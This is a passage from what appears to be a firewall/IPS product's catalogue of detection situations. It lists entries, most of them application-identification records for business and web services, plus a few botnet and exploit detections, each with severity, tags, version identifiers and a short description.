Last changed: sgpkg-ips-625-5211
Vulnerability: Backdoor-Poison-Ivy
Description:
Back to top

Datalength-TCP_Shared-Variables

About this situation: This fingerprint sets shared variables
Context: TCP DataLength Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, System Inspections
First detected in: sgpkg-ips-617-5211
Last changed: sgpkg-ips-617-5211
Vulnerability: Generic-Shared-Variables
Description:
Back to top

Datalength-TCP_W32/Nuwar@mm-Encrypted-Traffic

About this situation: W32/Nuwar@MM Encrypted Traffic detected
Context: TCP DataLength Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-615-5211
Vulnerability: W32/Nuwar@mm-Malware
Description:
Back to top

Datalength-TCP_ZeroAccess-Traffic

About this situation: ZeroAccess traffic detected
Context: TCP DataLength Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-616-5211
Vulnerability: ZeroAccess-Botnet
Description:
Back to top

Datalength-UDP_Gnu-C-Library-Getaddrinfo-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in GNU glibc detected
Context: UDP DataLength Stream
Severity: 7
Tags: Linux, Any Hardware, CVE2015, Linux not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1053-5242
Last changed: sgpkg-ips-1053-5242
Vulnerability: Gnu-C-Library-Getaddrinfo-Buffer-Overflow
Description:
Back to top

Datalength-UDP_Long-SNMP-Request

About this situation: A long SNMP request detected
Context: UDP DataLength Stream
Severity: 7
Tags: Linux, Any Hardware, Squid, CVE2014, Linux not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-607-5211
Last changed: sgpkg-ips-607-5211
Vulnerability: Squid-Snmphandleudp-Off-By-One-Buffer-Overflow
Description:
Back to top

Datalength-UDP_Long-Syslog-Message

About this situation: A long UDP Syslog message detected
Context: UDP DataLength Stream
Severity: 7
Tags: Any Operating System, Any Hardware, HP Intelligent Management Center, CVE2011, Any Operating System not specific, HP Intelligent Management Center not specific, Potential Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-573-5211
Last changed: sgpkg-ips-573-5211
Vulnerability: HP-Intelligent-Management-Center-Imcsyslogdm-Use-After-Free
Description:
Back to top

Datalength-UDP_OpenVPN-P_Control-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in OpenVPN detected
Context: UDP DataLength Stream
Severity: 7
Tags: Any Operating System, Any Hardware, OpenVPN, CVE2017, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-937-5242
Last changed: sgpkg-ips-937-5242
Vulnerability: OpenVPN-P_Control-Denial-Of-Service
Description:
Back to top

Datalength-UDP_Palevo

About this situation: A suspicious traffic pattern detected
Context: UDP DataLength Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1531-5242
Vulnerability: Palevo-Botnet
Description:
Back to top

Datalength-UDP_Shared-Variables

About this situation: This fingerprint sets shared variables
Context: UDP DataLength Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, System Inspections
First detected in: sgpkg-ips-1193-5242
Last changed: sgpkg-ips-1193-5242
Vulnerability: Generic-Shared-Variables
Description:
Back to top

Datalength-UDP_W32/Nuwar@mm-Encrypted-Traffic

About this situation: W32/Nuwar@MM Encrypted Traffic detected
Context: UDP DataLength Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-615-5211
Vulnerability: W32/Nuwar@mm-Malware
Description:
Back to top

Dataleveragegroup.com

About this situation: Application Dataleveragegroup.com detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Data Leverage Group - cloud-based solution designed to improve efficiencies and help hospitals realize cost savings goals, specializing in developing a robust and flexible platform for supply chain and value analysis professionals. Value Analysis Management Software
Back to top

Datalink

About this situation: Application Datalink detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Datalink a complete data center solutions and services provider, Datalink helps Fortune 500 and mid-tier enterprises get the most from every IT investment - with storage, server, and network expertise across the infrastructure. Datalink deliver greater business results throughout the data center, designing what sell, deploying what Datalink design.
Back to top

Datanyze

About this situation: Application Datanyze detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Datanyze is sales intelligence app for web technology companies. Datanyze's discovery tool examines websites to determine which technologies are being used. Datanyze's customers can set up custom alerts and get notifications whenever a website starts or stops using a particular web technology.
Back to top

Datapac

About this situation: Application Datapac detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Datapac is an ICT solutions provider, delivering solutions to organisations.
Back to top

Datapipe

About this situation: Application Datapipe detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Datapipe managed hosting, security and IT services: cloud computing, infrastructure as a service, platform as a service, colocation, data centers.
Back to top

Dataprise

About this situation: Application Dataprise detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Dataprise, Inc. is a provider of managed services and IT support for small and mid-sized businesses throughout the Mid-Atlantic region.
Back to top

Dataram

About this situation: Application Dataram detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Dataram is a manufacturer of memory products and provider of performance solutions.
Back to top

Datasift

About this situation: Application Datasift detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Datasift is platform to gain deeper insight into customer segments, markets and competitors.
Back to top

Datatrans

About this situation: Application Datatrans detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Datatrans is Swiss Payment Service Provider and concentrates on the technical payment processing in online trading
Back to top

Datawatch

About this situation: Application Datawatch detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Datawatch provides platform for visual analytics to leverage data - delivering insights for business. It has ability to acquire, prepare, and transform data from structured and multi-structured and allows users to dynamically discover factors that impact for business.
Back to top

Datawitness

About this situation: Application Datawitness detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Datawitness offers a patented electronic signature solution and online records archiving service for government, financial, education and small business industries.
Back to top

Datawrapper

About this situation: Application Datawrapper detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Datawrapper is an open source tool helping everyone to create simple, correct and embeddable charts in minutes.
Back to top

Datel

About this situation: Application Datel detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Datel is Sage's business partner. Specialising in Sage 200, Sage 1000, Sage ERP X3, Sage CRM and SalesLogix. Datel has experience in implementing ERP solutions to medium sized companies. With customers such as Vimto, Domino's Pizza and Play.com.
Back to top

DATEV-eG

About this situation: Application DATEV-eG detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: DATEV - technical information services provider for tax, accountant and attorneys.
Back to top

Daum

About this situation: Daum usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: This website provides internet services such as web-based e-mail, messaging services, forums, shopping, and news. Source: Wikipedia
Back to top

Daum-Blog

About this situation: Daum Blog usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-654-5211
Last changed: sgpkg-ips-1764-5242
Description: Daum Blog is a popular micro-blogging service in Korean. By using the service users can post blogs to the public. The service can be accessed at the website http://blog.daum.net.
Back to top

Daum-Mail

About this situation: Daum Mail usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Mail, Application Routing
First detected in: sgpkg-ips-639-5211
Last changed: sgpkg-ips-1764-5242
Description: Daum Mail is a Korean web mail service which offers space for users to store emails and attachments. The service can be accessed using web browser at website mail.daum.net.
Back to top

Daum-Mypeople

About this situation: Daum Mypeople usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Chat, Application Routing
First detected in: sgpkg-ips-635-5211
Last changed: sgpkg-ips-1764-5242
Description: Daum Mypeople is an instant messaging application developed by the Korean company Daum Kakao Inc.
Back to top

Day-Dots

About this situation: Application Day-Dots detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Ecolab Food Safety Specialties
Back to top

DayClips-Office

About this situation: Application DayClips-Office detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Dayclips is online office appointment scheduling program that combines appointments made in-person, on the phone, and over the internet into one easy to manage system.
Back to top

Dayforce-HCM

About this situation: Application Dayforce-HCM detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Dayforce HCM is a cloud-based application for Payroll Tax, Benefits, Workforce Management, Human Resources, Talent Management, Document Management, and Analytics. As a single application for HCM, Dayforce provides organizations with unprecedented access to real-time data and results across all domains of HCM.
Back to top

Daylite-for-Mac

About this situation: Application Daylite-for-Mac detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Marketcircle develops small business apps Daylite and Billings Pro for Mac and IOS.
Back to top

Dazhihui-Stockware

About this situation: DaZhiHui Stockware usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-629-5211
Description: This application is an online stock analysis and trading software used in China.
Back to top

DBAPPSecurity

About this situation: Application DBAPPSecurity detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: DBAPPSecurity focuses on web application security and database security. It provides web vulnerability scanner, web application firewall, database scanner, database auditor, log auditor, web monitor and professional security services for information security and risk management.
Back to top

DBX

About this situation: Application DBX detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: DBX - business software solution for medium and large companies
Back to top

Dc-Inside

About this situation: DC Inside usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: DC Inside is a community discussion board for South Koreans.
Back to top

Deac

About this situation: Application Deac detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: DEAC is full service data center operator . Reliable partner for more than 2500 customers from 40 countries.
Back to top

Deacom

About this situation: Application Deacom detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Deacom is the developer of a scalable, single-system ERP solution built to meet the complex needs of manufacturers and distributors.
Back to top

Deal-Pack

About this situation: Application Deal-Pack detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Deal Pack provides complete management software for automotive dealers and lenders.
Back to top

Dealer-Specialties

About this situation: Application Dealer-Specialties detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Dominion Dealer Solutions is the trusted provider of auto dealer products and services
Back to top

Dealer.com

About this situation: Application Dealer.com detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Dealer.com, a Dealertrack Technologies Solution, is the automotive provider of streamlined and intuitive solutions for managing car dealership marketing
Back to top

DealerOn

About this situation: Application DealerOn detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: DealerOn envisions becoming the first company to integrate a true transact online model of business for the automotive industry. For consumers who would like to purchase a car just as easily as they purchase a computer, book, or movie, DealerOn will provide the solution to enable it.
Back to top

DealershipRater

About this situation: Application DealershipRater detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: DealerRater established car dealer review website worldwide to help you find the right automotive dealer online when purchasing or servicing your car.
Back to top

DealerSocket

About this situation: Application DealerSocket detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: DealerSocket is a customer relationship management for the automotive Industry through technology, customer support and business execution.
Back to top

Dealertrack

About this situation: Application Dealertrack detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Dealertrack and its web-based software solutions and services enhance efficiency and profitability for all major segments of the automotive retail industry, including dealers, lenders, OEMs, third-party retailers, agents, and aftermarket providers.
Back to top

DealExtreme

About this situation: DealExtreme usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-601-5211
Last changed: sgpkg-ips-1764-5242
Description: DealExtreme usage detected. DealExtreme is a Chinese online shopping website.
Back to top

Dealio-Toolbar

About this situation: Dealio Toolbar usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-537-5211
Last changed: sgpkg-ips-628-5211
Description: Dealio Toolbar is a search engine-based toolbar that installs on the Internet Explorer and Firefox browsers.
Back to top

Dealix-Dealer-Services

About this situation: Application Dealix-Dealer-Services detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Dealer Services, Inc., a division of ADP, global technology solutions provider dedicated to helping dealerships drive measurable results across every area of their operation, announced today enhancements to their automotive dealership technology, including the ADP ServiceEdgeSM retail workflow tool that is revolutionizing the way dealers and consumers interact in the Fixed Operations area.
Back to top

DEAN-Alert

About this situation: Application DEAN-Alert detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: DEAN Alert Notification System is emergency communication systems.
Back to top

DEAR-Inventory

About this situation: Application DEAR-Inventory detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: DEAR systems is cloud based inventory system that integrates with QuickBooks and Xero.
Back to top

Debt-Collections-Software

About this situation: Application Debt-Collections-Software detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CaseTrackerLaw is a Web Based Debt Collections and Recovery Management Tool for/by collection attorneys, collection agencies, judgment recovery firms and debt buyers.
Back to top

Debtor-Daddy

About this situation: Application Debtor-Daddy detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Debtor Daddy is automated receivables management for small businesses. Works with your existing online accounting software proactively reducing overdue invoices and increasing cash flow.
Back to top

Debug_Message

About this situation: A debug message was sent
Context: Engine situations
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-1349-5242
Last changed: sgpkg-ips-1349-5242
Description: This log record contains debug information sent by the NGFW.
Back to top

Decibel-Insight

About this situation: Application Decibel-Insight detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Decibel Insight is a company offering enterprise-level behavioral and customer experience analytics tools to better understand website visitor behavior
Back to top

Decision-Support-Software

About this situation: Application Decision-Support-Software detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: LogisticNets Decision Support Software is a decision engine that lets you create, share, and manage web-based applications that contain your decision-making expertise
Back to top

Deem

About this situation: Application Deem detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Deem is a Commerce-as-a-Service
Back to top

DeepSeek

About this situation: DeepSeek usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1834-5242
Last changed: sgpkg-ips-1834-5242
Description: DeepSeek is a Chinese artificial intelligence.
Back to top

Deezer

About this situation: Deezer usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-432-4219
Last changed: sgpkg-ips-630-5211
Description: Deezer is a website that provides a free music streaming service. The service can be accessed using a webbrowser at the site: http://www.deezer.com.
Back to top

Defined-STEM

About this situation: Application Defined-STEM detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Hundreds of performance tasks, literacy tasks, and constructed responses, all using real-world themes, videos, and simulations for UbD and LDC frameworks.
Back to top

DEFT-Payment-Systems

About this situation: Application DEFT-Payment-Systems detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: DEFT Payment Systems offers a secure way to make payments to your biller.
Back to top

Degoo

About this situation: Application Degoo detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Degoo is backup service that gives users automatic, secure online backup in exchange for sharing some of their unused hard drive space.
Back to top

Degreed

About this situation: Application Degreed detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Degreed is an e-learning system that helps organizations see everything that their employees, teams, and company know.
Back to top

Delcam

About this situation: Application Delcam detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Delcam is a suppliers of advanced CADCAM solutions for manufacturing industry. Delcam's range of design, manufacturing and inspection software provides complete, automated CADCAM solutions, to take complex-shaped products from concept to reality.
Back to top

Delicious

About this situation: Delicious usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-392-4219
Last changed: sgpkg-ips-1371-5242
Description: Delicious is a social bookmarking web service that allows users to store, share, and discover web bookmarks.
Back to top

Delighted

About this situation: Application Delighted detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Delighted uses Net Promoter Score to gather real feedback from your customers.
Back to top

Deliverable blacklisting request

About this situation: Deliverable blacklisting request
Context: Engine situations
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-450-4333
Last changed: sgpkg-ips-1531-5242
Description: Deliverable blacklisting requested from $([[$LN_BLACKLISTER]]/resolved)
Back to top

Dell-Online-Self-Dispatch

About this situation: Application Dell-Online-Self-Dispatch detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Dell Online Self Dispatch provides ordering and shipment tracking, helping to order replacement parts, schedule installation and efficiently maintain dell hardware.
Back to top

Delta-Dental-of-Washington

About this situation: Application Delta-Dental-of-Washington detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Delta Dental is a not-for-profit organization and member of the nationwide Delta Dental Plans Association, the company provides a full range of dental plans, including traditional fee-for-service, preferred provider
Back to top

Delta-Skymiles

About this situation: Delta SkyMiles usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: This site allows users to purchase flights and vacation packages. Source: Wikipedia
Back to top

Demand-Solutions

About this situation: Application Demand-Solutions detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Demand Solutions provides software for forecast management, inventory planning, supply chain planning, SandOP, demand planning, and advanced planning and scheduling.
Back to top

Demandbase

About this situation: Application Demandbase detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Demandbase is the targeting and personalization company for B2B. Its B2B marketing cloud on subscription-based ad targeting and web personalization solution, enables marketers to connect campaigns directly to revenue.
Back to top

Demonoid.com

About this situation: Demonoid.com usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, P2P, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A p2p download service that allows users to search for torrent files for various types of content such as pirated software, movies, and music.
Back to top

Denon-Firmware-Update

About this situation: Denon Firmware Update usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Updates, Application Routing
First detected in: sgpkg-ips-570-5211
Last changed: sgpkg-ips-628-5211
Description: Denon Firmware Update is a service that provides new firmware for Denon appliances.
Back to top

Deploy-HQ

About this situation: Application Deploy-HQ detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Deploy is an easy to use fast code deployment platform.
Back to top

Deposco

About this situation: Application Deposco detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Deposco is a cloud-based, e-commerce order management and fulfillment software company to optimize supply chains from order to fulfillment.
Back to top

Deposit-Files

About this situation: DepositFiles usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, File Sharing, Application Routing
First detected in: sgpkg-ips-448-4219
Last changed: sgpkg-ips-630-5211
Description: Deposit files is a web-based file hosting service. The service lets user to upload, download, remove and share different files.
Back to top

Deputy

About this situation: Application Deputy detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Deputy is the cloud-based workforce management solution that makes to schedule employees, manage time and attendance, track performance.
Back to top

descartes

About this situation: Application descartes detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Descartes provides on-demand, software-as-a-service solutions focused on improving the productivity, performance and security of businesses.
Back to top

Design-On-Click

About this situation: Application Design-On-Click detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Design On Click is the international designer community, you can create your own personalized design project. Start a project in our logo design category, and let our designers compete to create your customized logo. Another popular category is web design, so if you are in need of a new design for your website, start a project with us at designonclick.com. You will be surprised by how many innovative drafts and ideas you will receive.
Back to top

Designer-Pages

About this situation: Application Designer-Pages detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Designer Pages is the new media platform and product management suite that empowers members of the architecture and design community to work better together. Architects and designers can find and share product information seamlessly, without the cumbersome, antiquated tools they formerly relied on, such as bookmarking pages and sharing hard copies.
Back to top

Desire2Learn

About this situation: Application Desire2Learn detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Desire2Learn is a learning solution that addresses key challenges related to learner engagement, retention, and outcomes. Desire2Learn offers integrated solutions to capture, deliver and manage all types of content.
Back to top

Deskaway

About this situation: DeskAway usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-567-5211
Last changed: sgpkg-ips-1764-5242
Description: DeskAway provides project and task management, milestone, issues, wiki-style document management, task lists, file sharing, internal blogs, calendar, contacts, messaging, personal email reminders, reports, user interface customizations, security, and integration with FreshBooks and Google Apps.
Back to top

Deskera

About this situation: Application Deskera detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Deskera offers integrated enterprise as a SaaS offering. The service includes Sales to Support in CRM, hire to retire in HR, Procure to pay in ERP, plan to delivery in project, in short, an integrated enterprise platform that's open source and available on the cloud.
Back to top

Deskero

About this situation: Application Deskero detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Deskero is a cloud-based software that offers simple yet effective tools to integrate requests coming from different channels (emails, chats, websites, social networks) into a single database.
Back to top

Deskmetrics

About this situation: DeskMetrics usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: This service allows software companies and developers to understand how their software is being used, helping in the development and decision making processes.
Back to top

Desura

About this situation: Application Desura detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Desura is a digital distribution service for gamers.
Back to top

Deutsche-Post-DHL

About this situation: Deutsche Post DHL usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-599-5211
Last changed: sgpkg-ips-1078-5242
Description: Deutsche Post DHL (Deutsche Post AG) is a courier and logistics company.
Back to top

DevGuard.com

About this situation: Application DevGuard.com detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: DevGuard.com is the Commercial Subversion hosting with integrated issue tracking for individuals and small businesses. Secure, encrypted data transfer, fast and realiable network access, easy to use web Control Panel.
Back to top

Deviantart

About this situation: deviantArt usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Storage, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: deviantArt aims to provide a place for any artist to exhibit and discuss works. Works are organized in a comprehensive category structure, including photography, digital art, traditional art, literature, Flash, filmmaking, skins for applications, and others, along with extensive downloadable resources such as tutorials and stock photography. "Fella", a small robotic cat character, is the official deviantArt mascot. Source: Wikipedia.
Back to top

DeviceCensus

About this situation: Endpoint Context Agent based DeviceCensus detection
Context: EI Correlation
Severity: 1
Tags: Non-Essential System Services, Endpoint
First detected in: sgpkg-ips-1180-5242
Last changed: sgpkg-ips-1180-5242
Description: A network connection initiated by DeviceCensus was detected. DeviceCensus is a Telemetry service on Windows 10 which reports back to Microsoft on information such as hardware status and errors.
Back to top

DeviceDisplayObjectProvider

About this situation: Endpoint Context Agent based DeviceDisplayObjectProvider.exe detection
Context: EI Correlation
Severity: 1
Tags: System Services, Endpoint
First detected in: sgpkg-ips-1062-5242
